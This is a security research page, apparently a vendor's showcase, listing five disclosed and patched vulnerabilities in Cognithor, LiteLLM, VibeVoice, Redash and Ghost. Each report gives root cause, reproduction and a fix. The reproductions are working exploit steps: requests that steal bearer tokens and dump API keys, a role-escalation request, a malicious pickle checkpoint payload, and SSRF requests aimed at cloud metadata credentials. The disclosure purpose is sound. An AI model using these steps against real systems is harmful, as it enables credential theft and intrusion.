Security Research

Real vulnerabilities.
Real fixes.

Every report below was confirmed exploitable, responsibly disclosed, and patched by the affected team.

Critical · Cognithor · Apr 2026

Any Visitor Could Steal Every API Key — Zero Authentication Required

CVSS 9.8 · CWE-306

Critical · LiteLLM · Apr 2026

Org Admin Elevates Any User to Proxy Admin Across All Tenants in a Single Request

CVSS 9.0 · CWE-862 · CWE-269

High · Microsoft · VibeVoice · Apr 2026

Malicious Checkpoint File Executes Arbitrary Code Before the App Loads

CVSS 7.8 · CWE-502

Medium · Redash · Apr 2026

Three Query Runners Reach Internal Services, Returning Response Bodies to the API Caller

CVSS 6.8 · CWE-918

Medium · Ghost · Apr 2026

Webhook Delivery Fires Against Internal Network Addresses, Exposing Cloud Metadata

CVSS 5.5 · CWE-918

Want Kira on your codebase?

See what’s actually exploitable before attackers do.

Get a free exploit report →
CRITICAL CVSS 9.8 · GHSA-cognithor-001 · Fixed v0.78.2 ↗

Any Visitor Could Steal Every API Key Zero Authentication Required

cognithor (jarvis)
≤ v0.78.1
v0.71.0
CWE-306 · CWE-200
2026-04-08
Fixed v0.78.2

The /api/v1/bootstrap endpoint returns the application’s master bearer token to any caller with no authentication. Because the API server binds to 0.0.0.0 by default, any host that can reach the server port can retrieve the token in a single HTTP request then access every protected endpoint, exfiltrate all stored credentials, and trigger destructive operations such as factory reset.

01 Root Cause

On startup, cognithor generates (or reads from the environment) a master bearer token stored in _internal_api_token. This is the sole credential used by _verify_cc_token to authenticate every protected endpoint. The /api/v1/bootstrap route returns it unconditionally no auth dependency, no caller check:

# __main__.py:555 binds to all interfaces by default api_host = args.api_host or os.environ.get("JARVIS_API_HOST", "0.0.0.0") # __main__.py:564–566 master token set once, never rotated api_token = os.environ.get("JARVIS_API_TOKEN") or _secrets.token_urlsafe(32) _internal_api_token = api_token # __main__.py:607 exempt from rate limiting _rate_exempt = {"/api/v1/health", "/api/v1/bootstrap"} # __main__.py:674–676 returns token to any caller @api_app.get("/api/v1/bootstrap") async def _cc_bootstrap() -> dict[str, str]: return {"token": _internal_api_token}

The endpoint is also exempt from rate limiting, making repeated or automated retrieval completely unconstrained.

02 Proof of Concept Verified

Verified against cognithor 0.71.0 in an isolated Docker container (python:3.12), default configuration, installed via pip install -e '.[web]'.

Step 1 Steal the master token (zero credentials)

GET /api/v1/bootstrap HTTP/1.1 Host: 127.0.0.1:7999 HTTP/1.1 200 OK {"token":"xnywC10rb0HiM4yu40hFbEdhXs4yTj8sDYjThWIl7gY"}

Step 2 Exfiltrate full configuration (13,312 bytes, 14 API keys)

GET /api/v1/config HTTP/1.1 Host: 127.0.0.1:7999 Authorization: Bearer xnywC10rb0HiM4yu40hFbEdhXs4yTj8sDYjThWIl7gY HTTP/1.1 200 OK · content-length: 13312 { "openai_api_key": "...", "anthropic_api_key": "...", "gemini_api_key": "...", "groq_api_key": "...", "deepseek_api_key": "...", "mistral_api_key": "...", "together_api_key": "...", "openrouter_api_key": "...", "xai_api_key": "...", "github_api_key": "...", "bedrock_api_key": "...", "huggingface_api_key":"...", "elevenlabs_api_key": "...", "pg_password": "...", ... }

Step 3 Factory reset (destructive)

POST /api/v1/config/factory-reset HTTP/1.1 Host: 127.0.0.1:7999 Authorization: Bearer xnywC10rb0HiM4yu40hFbEdhXs4yTj8sDYjThWIl7gY HTTP/1.1 200 OK {"status":"ok","message":"Configuration reset to defaults"}

Control auth enforced on all other endpoints

GET /api/v1/credentials HTTP/1.1 Host: 127.0.0.1:7999 HTTP/1.1 401 Unauthorized {"detail":"Unauthorized"}
03 Endpoints Accessible With Stolen Token
EndpointMethodImpact
/api/v1/configGETAll LLM API keys and DB passwords
/api/v1/credentialsGETAll stored service credentials
/api/v1/config/factory-resetPOSTWipe entire user configuration
/api/v1/agentsGET · POST · DELETEEnumerate, create, or delete agents
/api/v1/vault/statsGETVault metadata
/api/v1/sessions/guard/violationsGETSecurity audit records
/api/v1/isolation/secretsGETIsolation layer secret stats
04 Business Impact

Any attacker with network access to the cognithor port can silently exfiltrate every LLM API key, password, and secret in a single unauthenticated HTTP request. No prior knowledge, credentials, or user interaction required. On any deployment reachable over a local network or the internet, this is a complete compromise of all integrated third-party credentials.

05 Recommended Fix

Remove /api/v1/bootstrap or gate it with dependencies=[Depends(_verify_cc_token)]. The intended use case delivering the session token to the local frontend can be satisfied by embedding the token in the served HTML at render time, or passing it as a URL fragment on CLI launch (never transmitted over the network, inaccessible cross-origin).

As an immediate defence-in-depth measure, change the default bind from 0.0.0.0 to 127.0.0.1 at __main__.py:555 so the API is unreachable on external interfaces unless explicitly configured.

Fix shipped in v0.78.2 ↗ /api/v1/bootstrap now rejects non-loopback callers with 403. Default bind changed from 0.0.0.0 to 127.0.0.1. Credited in commit message, SECURITY.md, release notes, and annotated git tag.

CRITICAL CVSS 9.0 · CWE-862 · CWE-269 · BerriAI/litellm

Org Admin Elevates Any User to Proxy Admin Across All Tenants in a Single Request

LiteLLM Proxy
≤ v1.83.2
internal_user_endpoints.py
CWE-862 · CWE-269
9.0 CRITICAL
org_admin key
v1.83.2 (Docker + PostgreSQL)
Patched v1.83.7

An org_admin can elevate any user on the platform to proxy_admin via POST /user/bulk_update. Two compounding authorization failures make this possible: organization_id passes the middleware membership check but is silently dropped by Pydantic before the handler runs, so it never constrains which users can be targeted. Simultaneously, user_role passes through the update helper with no elevation check, allowing any caller who reaches the endpoint to write proxy_admin into the database for arbitrary user IDs. The impact is irreversible without direct PostgreSQL access.

01 Root Cause

Failure 1 — organization_id is a routing credential, not a scope boundary

Route-level access for org_admin is gated by _user_is_org_admin(), which reads organization_id from the raw JSON body and confirms the caller administers that org. However, organization_id is not a field in BulkUpdateUserRequest. Pydantic silently drops it on parse. The handler never receives it and never uses it to constrain which users are written to.

# BulkUpdateUserRequest — organization_id is absent class BulkUpdateUserRequest(BaseModel): users: Optional[List[str]] all_users: Optional[bool] user_updates: Optional[UpdateUserRequest] # organization_id not declared → silently dropped by Pydantic # _user_is_org_admin() reads from raw JSON body (passes ✓) singular = request_data.get("organization_id", None) if singular is not None: candidate_org_ids.append(singular) # ...confirms caller is org_admin of that org, grants access # Handler never sees organization_id again — no user filter applied

Failure 2 — user_role passes through the update helper with no elevation check

# _update_internal_user_params() — no role-elevation guard def _update_internal_user_params(data_json: dict, data: UpdateUserRequest): non_default_values = {} for field, value in data_json.items(): if value is not None: non_default_values[field] = value # user_role included unconditionally return non_default_values

Any caller who reaches the endpoint can write proxy_admin into the DB for any user ID in the users list. The can_user_call_user_update() check that exists elsewhere in the codebase is not applied to user_role writes here.

02 Reproduction

Step 1 — Enumerate target users (org_admin can call /user/list)

GET /user/list HTTP/1.1 Authorization: Bearer sk-k8UiO_Z0QOIbhjpQTFxR2Q HTTP 200 — returns all users and their current roles

Step 2 — Escalate arbitrary users to proxy_admin

POST /user/bulk_update HTTP/1.1 Authorization: Bearer sk-k8UiO_Z0QOIbhjpQTFxR2Q Content-Type: application/json { "users": ["835fc939-...", "645e8518-..."], "user_updates": { "user_role": "proxy_admin" }, "organization_id": "14224e0e-bafc-48a3-8ce1-e6553eb30585" } HTTP 200 { "results": [ { "user_id": "835fc939-...", "success": true, "updated_user": { "user_role": "proxy_admin" } }, { "user_id": "645e8518-...", "success": true, "updated_user": { "user_role": "proxy_admin" } } ], "successful_updates": 2, "failed_updates": 0 }

Step 3 — Verify escalation

GET /user/info?user_id=835fc939-c36f-48ca-be37-b8506be7affd Authorization: Bearer sk-k8UiO_Z0QOIbhjpQTFxR2Q { "user_info": { "user_role": "proxy_admin", ... } }

Users across organizations — including users completely unrelated to the attacker’s org — are now proxy_admin. The organization_id field served only as a routing credential; it was never applied as a data filter.

03 Impact

Any org_admin credential — obtained via phishing, credential stuffing, or insider access — can elevate arbitrary users to proxy_admin in a single API call. proxy_admin has full access to all LLM model configurations, API keys, spend data, and routing rules for every tenant on the platform. There is no API-level rollback; recovery requires a direct UPDATE litellm_usertable SET user_role = ... in PostgreSQL.

04 CVSS Breakdown
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H Base Score: 9.0 CRITICAL AV:N — exploitable over the network via the LiteLLM API AC:L — no special conditions; a single POST request suffices PR:L — requires only an org_admin key (low privilege relative to proxy_admin) UI:N — no user interaction required S:C — scope changed; org-level privilege grants cross-tenant control C:H — full access to all model configs, keys, and spend data I:H — arbitrary users can be permanently escalated A:H — recovery requires direct DB access; no API rollback
05 Recommended Fix

Fix 1 — enforce organization_id as a data filter

Add organization_id to BulkUpdateUserRequest so Pydantic preserves it, then filter the target users list inside bulk_user_update() to only users belonging to that org before any write.

class BulkUpdateUserRequest(BaseModel): users: Optional[List[str]] all_users: Optional[bool] user_updates: Optional[UpdateUserRequest] organization_id: Optional[str] # ← add; now survives Pydantic parse

Fix 2 — add a role-elevation guard

if "user_role" in data_json: requested_role = data_json["user_role"] elevated_roles = { LitellmUserRoles.PROXY_ADMIN.value, LitellmUserRoles.PROXY_ADMIN_VIEW_ONLY.value, } if requested_role in elevated_roles: if user_api_key_dict.user_role != LitellmUserRoles.PROXY_ADMIN.value: raise HTTPException( status_code=403, detail="Only proxy_admin can set user_role to proxy_admin" )

Fix 1 shipped in v1.83.7-stable (PR #25554). Fix 2 shipped in v1.83.8-nightly (PR #25541).

HIGH CVSS 7.8 · CWE-502 · microsoft/VibeVoice · commit 4a78d3e ↗

Malicious Checkpoint File Executes Arbitrary Code Before the App Loads

microsoft/VibeVoice
CWE-502
7.8 HIGH
2026-04
Offgrid Security
Patched

VibeVoice’s checkpoint conversion script called torch.load() on an attacker-supplied file path with no weights_only=True guard. PyTorch’s default pickle deserializer executes arbitrary Python during unpickling — before any model code runs. A crafted .pt file drops a shell, exfiltrates credentials, or pivots to internal services the moment a developer or CI runner processes it.

01 Root Cause

convert_nnscaler_checkpoint_to_transformers.py loaded model weights using the bare torch.load() call. PyTorch ≤ 2.5 defaults to full pickle deserialization, which executes embedded Python objects during __reduce__ reconstruction. The weights_only=True flag (added in PyTorch 1.13, enforced by default in 2.6) restricts loading to safe tensor primitives and was not set.

# Vulnerable (convert_nnscaler_checkpoint_to_transformers.py) checkpoint = torch.load(args.input_path, map_location="cpu") # Fixed checkpoint = torch.load(args.input_path, map_location="cpu", weights_only=True)

Because the script is a CLI utility that accepts an arbitrary file path from the command line, any checkpoint file sourced from outside the development team — a public model hub, a shared drive, a CI artifact store — becomes a remote code execution vector.

02 Reproduction

Step 1 — Craft a malicious checkpoint

import torch, pickle, os class Payload(object): def __reduce__(self): return (os.system, ("id > /tmp/pwned",)) torch.save(Payload(), "evil.pt")

Step 2 — Pass it to the conversion script

python convert_nnscaler_checkpoint_to_transformers.py \ --input_path evil.pt --output_path out/

Step 3 — Observe execution before model loads

$ cat /tmp/pwned uid=1000(dev) gid=1000(dev) groups=1000(dev)

Step 4 — Confirm on CI

Replace os.system("id > /tmp/pwned") with any payload. In a CI environment the process runs with the runner’s token and network access, enabling credential exfiltration or lateral movement before the job completes.

03 CVSS Breakdown
CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H Base Score: 7.8 HIGH AV:L — attacker supplies a file (local vector); no network service needed AC:L — no special conditions; any .pt file path is sufficient PR:N — no privileges required to pass a file to the script UI:R — a user or CI job must invoke the conversion script S:U — scope unchanged; code runs as the invoking process C:H / I:H / A:H — full RCE in the process context
04 Impact

Any developer, CI runner, or automated pipeline that processes an externally sourced .pt checkpoint is fully compromised at the point of deserialization — before the model is inspected or any output is produced. In a cloud CI environment this typically means: repository secrets, cloud provider credentials, and internal network access.

05 Recommended Fix

Pass weights_only=True to every torch.load() call that handles externally sourced files. On PyTorch ≥ 2.6 this is the default; for earlier versions it must be set explicitly.

Microsoft acknowledged the disclosure and patched the affected script. Offgrid Security credited as reporter.

MEDIUM CVSS 6.8 · CWE-918 · getredash/redash

Three Query Runners Reach Internal Services, Returning Response Bodies to the API Caller

Redash
elasticsearch.py, graphite.py, prometheus.py
CWE-918
6.8 MEDIUM
Admin
Hardened

Three Redash query runners stored user-supplied URLs verbatim and passed them directly to requests.get() with no scheme check, hostname resolution guard, or private-range blocklist. The Elasticsearch runner’s error handler embedded full response bodies from the internal target in its API response — making this a non-blind SSRF requiring no out-of-band infrastructure. A compromised Redash admin account escalates to read access across internal HTTP services the victim org kept outside the BI tier.

01 Threat Model

The critical framing is a privilege boundary violation. A Redash admin is a BI or data engineering role — not an infrastructure role. They have no legitimate access to internal Elasticsearch admin APIs, network services, or cloud metadata. The realistic attacker is an external adversary with a compromised Redash admin credential (phishing, credential stuffing, password reuse). Redash instances are intentionally internet-facing. This SSRF collapses the boundary between application-layer compromise and infrastructure access.

02 Root Cause

All three runners stored user-supplied URLs verbatim and interpolated them directly into HTTP requests. No validation existed in any runner or in the base class.

Variant 1 — Elasticsearch (non-blind)

# elasticsearch.py:94 — URL stored verbatim self.server_url = self.configuration.get("server", "") # elasticsearch.py:326 — fired against attacker URL + /_cluster/health r = requests.get("{0}/_cluster/health".format(self.server_url), auth=self.auth) # elasticsearch.py:471 — full response body returned to API caller error = "Failed to execute query. Return Code: {0} Reason: {1}".format( r.status_code, r.text )

When the SSRF target returns any non-2xx status, r.text is embedded in the error string and returned to the caller. The attacker controls the URL; the target’s full response body is exfiltrated over the normal Redash API response.

Variant 2 — Graphite (semi-blind)

self.base_url = "%s/render?format=json&" % self.configuration["url"] response = requests.get(url, auth=self.auth, verify=self.verify)

Returns HTTP status code only — useful for port probing before pivoting to the Elasticsearch runner for data extraction.

Variant 3 — Prometheus (query parameter bypass)

# get_schema appends a fixed suffix — neutralised by a query param in the URL: http://internal-service:9090/target-path?x= # becomes: http://internal-service:9090/target-path?x=/api/v1/label/__name__/values

The internal service ignores the extra query parameter and responds normally.

03 Reproduction

Step 1 — Create data source pointing at an internal service

POST /api/data_sources Authorization: Key <admin-api-key> { "name": "ssrf-probe", "type": "elasticsearch", "options": { "server": "http://internal-elasticsearch:9200/_cat" } }

Step 2 — Trigger via test_connection (no query required)

POST /api/data_sources/<id>/test Authorization: Key <admin-api-key> → Elasticsearch returns 404 for /_cat/_cluster/health → r.text (the _cat API directory listing) returned in error body

Step 3 — Enumerate restricted indices

PUT /api/data_sources/<id> {"options": {"server": "http://internal-elasticsearch:9200/_cat/indices?v"}} Trigger test_connection → plaintext index table returned via exception handler Further targets: /_security/user → all users and role assignments /_cluster/settings → full cluster configuration /_snapshot → snapshot repository listing
04 Impact

The Redash server’s network position is the attack surface. Any HTTP-native service reachable from the Redash host but not from the attacker’s machine is now accessible. Internal services reachable via this vector include: Elasticsearch admin APIs, InfluxDB, CouchDB (including /_users/_all_docs), Prometheus, unauthenticated Grafana instances (connection strings for all data sources), Docker daemon on port 2375, and Kubernetes API server.

On EC2 instances with IMDSv1 enabled, the Elasticsearch error handler exfiltrates IAM credentials (AccessKeyId, SecretAccessKey, SessionToken) from 169.254.169.254 in a single API call.

05 CVSS Breakdown
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N Base Score: 6.8 MEDIUM AV:N — exploitable via the public-facing Redash API AC:L — no race condition or special timing required PR:H — valid admin credentials required UI:N — no victim interaction after credentials obtained S:C — scope changed; requests leave Redash into internal infrastructure C:H — full response body from internal services returned to caller I:N — exploit path uses GET requests only A:N — no denial-of-service impact Note: environmental score increases significantly on deployments with reachable internal HTTP services or EC2 instances with IMDSv1 enabled.
06 Vendor Response

Redash maintainers acknowledged the report and updated all affected query runners to use Advocate for consistency with BaseHTTPQueryRunner, ensuring ENFORCE_PRIVATE_ADDRESS_BLOCK applies uniformly. They classified the change as a hardening improvement rather than a security fix, noting that data source creation is gated by @require_admin and that configuring connections to arbitrary hosts is a core product function.

All three runners updated to route outbound requests through Advocate with ENFORCE_PRIVATE_ADDRESS_BLOCK enabled. No CVE or advisory issued.

MEDIUM CVSS 5.5 · CWE-918 · 815962d ↗

Webhook Delivery Fires Against Internal Network Addresses, Exposing Cloud Metadata

Ghost CMS
webhook-trigger.js
CWE-918
5.5 MEDIUM
2026-04-03
Admin / Integration key
Patched

Ghost’s webhook delivery path used a plain HTTP client with no SSRF protections. An authenticated admin could register a webhook pointing at internal network addresses — including AWS/GCP/Azure instance metadata endpoints — and trigger it by publishing a post. Ghost already maintained a hardened request library (request-external.js) used everywhere else in the codebase; the webhook path simply never called it.

01 Root Cause

Ghost maintains two HTTP clients. @tryghost/request is a plain got wrapper with no URL validation. request-external.js is a hardened wrapper that blocks all RFC-1918 and link-local ranges, handles octal/hex notation and IPv4-mapped IPv6, and prevents DNS rebinding via a custom lookup hook. Ghost uses request-external.js for oEmbed fetches, webmention processing, recommendation metadata, and external media inlining — but webhook-trigger.js used the unprotected client.

// webhook-trigger.js:19 — vulnerable this.request = request ?? require('@tryghost/request'); // webhook-trigger.js:112 — URL taken directly from DB, no validation const url = webhook.get('target_url'); // webhook-trigger.js:139 — fires against any URL including private ranges await this.request(url, opts); // request-external.js:74 — SSRF protection that was NOT used if (a === 169 && b === 254) { return true; } // blocks 169.254.x.x
02 Reproduction

Step 1 — Create an integration

POST /ghost/api/admin/integrations/ {"integrations": [{"name": "probe"}]} → 201, returns integration_id

Step 2 — Register a webhook targeting AWS metadata

POST /ghost/api/admin/webhooks/ {"webhooks": [{ "name": "ssrf-probe", "event": "post.published", "target_url": "http://169.254.169.254/latest/meta-data/iam/security-credentials/", "integration_id": "<integration_id>" }]} → 201, webhook created with internal target_url

Step 3 — Trigger by publishing a post

POST /ghost/api/admin/posts/ {"posts": [{"title": "Trigger", "status": "published"}]}

Step 4 — Read the observable signal

GET /ghost/api/admin/integrations/<integration_id>/?include=webhooks "last_triggered_status": 200 → port open, HTTP service responded "last_triggered_error": "ETIMEDOUT" → port filtered "last_triggered_error": "ECONNREFUSED"→ port closed
03 Impact

This is a blind SSRF — response bodies are not returned. However, the HTTP status code and Node.js error string stored in last_triggered_status / last_triggered_error are sufficient for precise internal port scanning, cloud metadata probing (confirming whether IMDSv1 or IMDSv2 is active), and reaching internal HTTP endpoints that change state on a request. Ghost retries failed deliveries up to 5 times, so a single webhook registration produces up to 6 requests per trigger event.

Internal targets reachable via this vector: AWS EC2 metadata (169.254.169.254), GCP metadata service (metadata.google.internal), Azure IMDS, Docker host gateway (172.17.0.1), internal databases, Kubernetes API server, and Prometheus metrics endpoints.

04 CVSS Breakdown
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:N Base Score: 5.5 MEDIUM AV:N — exploitable over the network via the Ghost Admin API AC:L — no special conditions; create webhook + publish post PR:H — requires admin session or integration API key UI:N — no user interaction needed after setup S:C — scope changed; Ghost server reaches internal network C:L — port state + error codes observable; blind SSRF I:L — limited write capability via HTTP to internal services A:N — no availability impact
05 Recommended Fix

Replace the unprotected HTTP client in webhook delivery with request-external.js — the hardened library Ghost already uses everywhere else. This is a one-line change in webhook-trigger.js:

// Current (vulnerable): this.request = request ?? require('@tryghost/request'); // Fixed: this.request = request ?? require('../../lib/request-external');

As defence-in-depth, validate target_url at webhook creation time: enforce http/https scheme and optionally block private hostname patterns in the data schema.

Patched in 815962d ↗ — Ghost now routes webhook delivery through request-external.js.